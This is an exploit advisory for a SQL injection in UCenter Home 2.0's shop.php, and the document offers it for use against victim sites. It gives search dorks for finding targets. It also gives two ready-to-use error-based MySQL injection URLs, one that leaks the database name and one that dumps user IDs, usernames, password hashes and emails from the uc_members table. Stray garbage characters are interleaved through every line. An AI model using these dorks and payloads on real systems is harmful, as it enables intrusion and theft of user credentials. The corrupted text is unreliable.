9 }6 D6 q) _6 f; n: R& p; b
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 1 p2 E! A0 y+ B) |' N
+ S8 e X/ [. a, M4 X
$ j6 @3 F! q0 Y5 W- I. E* U) w% y9 {0 C
*/ Author : KnocKout
; K+ P# `2 h' m% C
% h+ D. u6 S" v& L* }5 S6 I% q( F*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
4 v+ \9 s9 Q9 | L! o p/ K
6 y- A1 k7 m5 S! i& s7 S7 P*/ Contact: knockoutr@msn.com
$ z3 e+ ~; P# h; ?
% _8 j0 H ?9 R0 M0 e( P$ h*/ Cyber-Warrior.org/CWKnocKout - I! \+ d3 i5 O9 y) C; q s* L
+ I7 U( w- e6 d" N__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
, j4 q+ l4 Q; U, P& e
+ |" H. f8 u. j% o$ T5 f' VScript : UCenter Home
0 a6 j8 x8 L7 V* x# g7 o) g F0 k+ x+ T7 h3 a
Version : 2.0 9 V8 [) v" ^2 D* u2 @
$ ~: Q( G! {5 H1 t( y- S; J
Script HomePage : http://u.discuz.net/ 2 ^$ g# I$ @. J& |
- k. @7 L! N C, D7 Z
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
+ `8 ^: L9 C6 T3 @9 K6 I" [$ o6 R$ B
Dork : Powered by UCenter inurl:shop.php?ac=view # y7 r# l I% _/ d
! O7 k) l" k: h: U9 _7 R7 m) M
Dork 2 : inurl:shop.php?ac=view&shopid=
9 r/ y. s9 S) a" z- M7 V$ y1 C2 d8 c6 e0 ?, O5 a- f& x
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
; t9 m- v% e4 U% w8 X' {6 M/ |/ c
2 w( f' ~! T" w. S( [Vuln file : Shop.php
, p5 ^ b2 P. f6 X" ]) C/ s9 l$ w" V; K
value's : (?)ac=view&shopid= 4 z0 u1 Q* q/ U
2 \9 \. J- o- j' o$ N W
Vulnerable Style : SQL Injection (MySQL Error Based)
# F+ w! A# f/ N0 |( \5 D, N, p+ p9 {1 p$ V( w/ B7 O% H! z2 J
Need Metarials : Hex Conversion 5 W$ I/ w) A3 [$ |. H3 O) r! D! z
* d# U3 S" `- B( g0 N
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
8 C# H4 T% t/ _0 `! [ k. ^. G) `, Y; q' F: [& M
Your Need victim Database name. ; T2 e" i, B$ M: p; m d& c
& L. F; X* `9 e, M0 M5 t, X
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
$ C, h. Z, g9 | }$ u# H! n% k: l6 a# D, `6 i
.. 7 V& a5 {- `) {% x& t$ s. C
( I. `8 e$ ^! ?& n: h+ {
DB : Okey. 6 P: c& |8 E( b8 f- v1 ]
. Z, I; u D7 |) c7 s* a
your edit DB `[TARGET DB NAME]` 8 y" y5 ]7 i( r0 I( W6 N$ Q# m5 ?
, X) F" _ W) [/ Y& w3 o
Example : 'hiwir1_ucenter'
4 N1 Z- I H5 V. R
, Q D' s9 f+ [) @! i) ~! ~Edit : Okey. 4 h* g3 b! i3 q/ ~ k4 X
$ h! l' E3 u1 d9 n' j' h6 }% D8 I; y
Your use Hex conversion. And edit Your SQL Injection Exploit..
) J6 [1 H' G9 v$ x# {# ^) b* j! p
9 @( j8 W" }7 V( d3 y8 c& y ; x" J- Z: x4 V! V/ }
$ ?: T3 F5 G% U- ~& f0 F
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 9 w# O! Q2 l/ n8 r( U& O
|